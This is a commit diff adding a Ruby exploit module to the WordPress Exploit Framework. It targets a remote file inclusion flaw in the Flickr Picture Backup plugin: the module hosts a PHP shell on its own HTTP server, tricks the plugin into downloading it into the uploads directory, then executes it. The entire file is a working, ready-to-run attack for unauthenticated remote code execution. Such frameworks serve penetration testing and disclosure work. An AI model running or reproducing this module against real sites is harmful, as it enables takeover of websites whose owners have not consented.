|
| 1 | +class Wpxf::Exploit::FlickrPictureBackupRfiShellUpload < Wpxf::Module |
| 2 | + include Wpxf |
| 3 | + include Wpxf::Net::HttpServer |
| 4 | + include Wpxf::WordPress::ShellUpload |
| 5 | + |
| 6 | + def initialize |
| 7 | + super |
| 8 | + |
| 9 | + update_info( |
| 10 | + name: 'Flickr Picture Backup RFI Shell Upload', |
| 11 | + desc: %( |
| 12 | + Flickr Picture Bacup suffers from a remote file inclusion vulnerability |
| 13 | + which allows unauthenticated users to download and execute a PHP shell |
| 14 | + hosted on a remote server. |
| 15 | +
|
| 16 | + This module will host a HTTP server to serve the payload, and make a request |
| 17 | + to the target that will initiate the download and execution of the payload. |
| 18 | + ), |
| 19 | + author: [ |
| 20 | + 'Larry W. Cashdollar', # Discovery and disclosure |
| 21 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 22 | + ], |
| 23 | + references: [ |
| 24 | + ['WPVDB', '8803'], |
| 25 | + ['URL', 'http://www.vapidlabs.com/advisory.php?v=190'] |
| 26 | + ], |
| 27 | + date: 'Apr 26 2017' |
| 28 | + ) |
| 29 | + |
| 30 | + register_options([ |
| 31 | + StringOption.new( |
| 32 | + name: 'rfi_host', |
| 33 | + desc: 'The address of the host listening for a connection', |
| 34 | + required: true |
| 35 | + ), |
| 36 | + StringOption.new( |
| 37 | + name: 'rfi_path', |
| 38 | + desc: 'The path to access via the remote file inclusion request', |
| 39 | + default: Utility::Text.rand_alpha(8), |
| 40 | + required: true |
| 41 | + ) |
| 42 | + ]) |
| 43 | + end |
| 44 | + |
| 45 | + def check |
| 46 | + check_plugin_version_from_readme('flickr-picture-backup', '0.9') |
| 47 | + end |
| 48 | + |
| 49 | + def rfi_host |
| 50 | + normalized_option_value('rfi_host') |
| 51 | + end |
| 52 | + |
| 53 | + def rfi_path |
| 54 | + normalized_option_value('rfi_path') |
| 55 | + end |
| 56 | + |
| 57 | + def rfi_url |
| 58 | + "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}" |
| 59 | + end |
| 60 | + |
| 61 | + def on_http_request(_path, _params, _headers) |
| 62 | + payload.encoded |
| 63 | + end |
| 64 | + |
| 65 | + def uploader_url |
| 66 | + normalize_uri(wordpress_url_plugins, 'flickr-picture-backup', 'flickr-picture-download.php') |
| 67 | + end |
| 68 | + |
| 69 | + def upload_request_params |
| 70 | + { 'url' => rfi_url } |
| 71 | + end |
| 72 | + |
| 73 | + def uploaded_payload_location |
| 74 | + normalize_uri(wordpress_url_uploads, 'flickr_backup', payload_name) |
| 75 | + end |
| 76 | + |
| 77 | + def payload_body_builder |
| 78 | + builder = Utility::BodyBuilder.new |
| 79 | + builder.add_field('url', rfi_url) |
| 80 | + builder |
| 81 | + end |
| 82 | + |
| 83 | + def execute_payload(url) |
| 84 | + stop_http_server |
| 85 | + super(url) |
| 86 | + end |
| 87 | + |
| 88 | + def run |
| 89 | + start_http_server true |
| 90 | + super |
| 91 | + end |
| 92 | +end |
0 commit comments